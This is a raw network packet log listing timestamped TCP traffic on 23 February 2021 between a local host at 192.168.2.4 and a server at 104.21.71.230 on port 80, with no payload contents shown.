Feb 23, 2021 15:31:13.832144022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832160950 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832178116 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832184076 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.832195044 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832207918 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.832216024 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832235098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832248926 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.832258940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832279921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832292080 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832295895 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.832310915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.832319021 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.832350016 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833194017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833214045 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833230972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833250999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833275080 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833302021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833323956 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833327055 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833342075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833355904 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833393097 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833417892 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833436012 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833451986 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833467960 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833468914 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833482027 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833515882 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833575010 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833818913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833846092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833872080 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833894968 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833900928 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833916903 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833940983 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833956003 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.833966017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.833991051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.834003925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.834002972 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.834063053 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.834953070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.834969997 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.834983110 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.834995985 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835011959 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835024118 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835036993 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835050106 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835062027 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835074902 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835092068 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835103989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835117102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835129976 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835201025 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835242987 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835249901 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835253954 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835455894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835474014 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835485935 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835499048 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835511923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835525036 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835537910 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835541010 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835550070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835557938 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835565090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835583925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835601091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.835602045 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835621119 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.835652113 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.836147070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836163998 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836177111 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836190939 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836203098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836234093 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.836261034 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.836278915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836296082 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836308956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836324930 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836344957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836354017 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.836361885 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836380005 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836385012 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.836393118 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836410999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.836426020 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.836450100 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837064981 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837090969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837116003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837141037 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837150097 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837163925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837179899 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837196112 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837222099 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837229967 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837246895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837272882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837280989 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837296009 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837320089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837330103 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837340117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837366104 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837399960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837419033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.837419033 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.837986946 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838006973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838026047 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838048935 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838068962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838076115 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.838090897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838114023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838113070 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.838136911 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838144064 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.838156939 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838170052 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.838290930 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839004040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839025021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839036942 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839050055 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839061975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839085102 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839107037 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839134932 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839215040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839232922 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839245081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839257956 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839293957 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839307070 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839309931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839327097 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839328051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839349031 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839369059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839387894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839406967 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839423895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839440107 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839457035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.839458942 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839468956 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839473963 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839478970 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.839509010 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.840303898 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840336084 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840348959 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840362072 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840373993 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840387106 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840398073 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840410948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840429068 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840440989 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840451002 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840537071 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.840590954 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.840673923 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.840786934 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840807915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840888977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840908051 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840910912 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.840926886 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840949059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840971947 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.840982914 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.840990067 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841010094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841022968 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841036081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841039896 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841062069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841074944 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841075897 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841092110 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841120958 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841151953 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841718912 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841741085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841758013 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841773987 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841795921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841811895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841815948 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841829062 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841831923 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841851950 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841866970 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841876984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841880083 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841903925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841928005 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841934919 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.841953039 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841976881 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.841999054 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842012882 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.842032909 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.842858076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842888117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842909098 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842935085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842961073 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842964888 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.842986107 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.842995882 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843010902 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843013048 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843035936 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843059063 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843064070 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843079090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843095064 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843115091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843132973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843137026 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843149900 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843172073 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843194962 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843570948 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843589067 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843605995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843621969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843641996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843668938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843672037 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843688965 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843707085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843709946 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843734026 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843760014 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843775988 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843796015 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843822956 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843825102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843851089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843874931 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.843877077 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.843919992 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.844515085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844536066 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844552040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844564915 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844578028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844589949 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844602108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844614983 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844628096 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844645977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844662905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844680071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844703913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844729900 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.844783068 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.844813108 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.845422029 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845443010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845458984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845475912 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845493078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845514059 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845531940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845539093 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.845544100 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845554113 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.845558882 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845577955 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845592976 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.845597029 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845616102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845622063 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.845628977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845642090 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.845674992 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.845691919 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.846340895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846362114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846379042 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846400023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846417904 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846435070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846447945 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846461058 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846478939 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846481085 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.846493959 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.846503019 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846520901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846533060 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.846539021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846544027 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.846558094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846575022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.846576929 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.846632004 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847335100 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847362995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847384930 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847408056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847436905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847439051 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847460985 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847469091 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847489119 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847501040 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847516060 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847542048 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847569942 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847572088 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847594976 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847609043 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847621918 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847654104 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847675085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.847687960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.847709894 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.848186016 CET	80	49752	104.21.71.230	192.168.2.4
